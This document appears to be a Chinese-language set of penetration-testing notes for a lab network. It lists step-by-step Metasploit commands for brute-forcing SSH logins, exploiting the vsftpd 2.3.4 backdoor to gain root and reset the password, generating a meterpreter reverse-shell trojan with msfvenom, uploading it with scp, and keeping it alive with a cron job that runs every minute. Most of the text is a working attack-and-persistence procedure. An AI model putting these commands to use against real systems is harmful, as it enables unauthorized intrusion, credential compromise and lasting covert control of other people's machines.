==禁止非法操作,仅限参考=
暴力破解
- 编辑密码本(vim password.txt)
- 无声进入msf(msfconsole -q)
- 搜索ssh_login相关程序(search ssh_login)
- 设置攻击参数(use 0)
 设置用户名(set username msfadmin)
 设置密码本(set pass_file /root/password.txt)
 设置攻击目标(set rhosts 192.168.10.143)
- 发起攻击(运行run)
- 查看攻击会话(sessions)
- 进入某个会话(sessions ID)
- 退出(exit)
- show options://显示程序运行时所需要的参数
漏洞利用
- 扫描目标是否存在“笑脸漏洞(vsftpd2.3.4)”(nmap -sV ip)
- 发起漏洞利用
 进入msf(msfconsole)
 搜索vsftpd(search vsftpd)
 使用程序(use 0)
 设置攻击目标(set rhosts ip)
- 发起攻击(run)
- whoami://查看是哪个用户
- passwd root:// 设置密码
植入木马,达到长期控制的目的
- msfvenom:攻击载荷生成器
 -p://选择一个载荷
 -f://生成文件格式 (linux可执行的程序文件:elf,windows可执行的文件:exe)
 lhost://监听地址(攻击机kali的地址)
 lport://监听端口(攻击机kali的端口)
 -o:指定输出的文件名
 -h:查看帮助
- msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf lhost=192.168.10.224 lport=4444 -0 shell: // 给主机192.168.10.224,生成一个名为shell,端口为4444的木马程序
为了防止上传报错,需要修改kali的ssh配置
- 创建.ssh目录
 mkdir .ssh
- 配置config
 vim .ssh/config
- 添加三行配置
- Host
- HostkeyAlgorithms +ssh-rsa
- PubkeyAcceptedKeyTypes +ssh-rsa
- 以root身份上传shell后门到192.168.10.143的/mnt
 scp shell root@192.168.10.143:/mnt
运行shell
- 手动运行shell后门程序
 /mnt/shell & (&后台运行)
- 在kali中侦听木马程序
- 进入msf
 msfconsole
- 使用侦听程序
 use exploit/multi/handler
- 设置监听地址
 set lhost 192.168.10.224
- 设置监听端口
 set lport 4444
- 设置载荷
 set payload linux/x86/meterpreter/reverse_tcp
- 运行
 run
 ps:侦听模块在侦听木马上线的时候参数值必须与生成木马的参数一致
如果想要让木马长期运行不被kill,需要做计划任务,定期运行
- 编辑计划任务:
- EDITOR:编辑器
 EDITOR=vim crontab -e-  -  -  -  - /mnt/shell&(每分钟运行一次)
 
 
-  
 
-  
 
-  
 
-  
- 再次进入msf
- 使用侦听程序
 use exploit/multi/handler
- 设置监听地址
 set lhost 192.168.10.224
- 设置监听端口
 set lport 4444
- 设置载荷
 set payload linux/x86/meterpreter/reverse_tcp
- 运行
 run
- 查看计划任务
 crontab -l
- meterpreter>下将会话放到后台
 background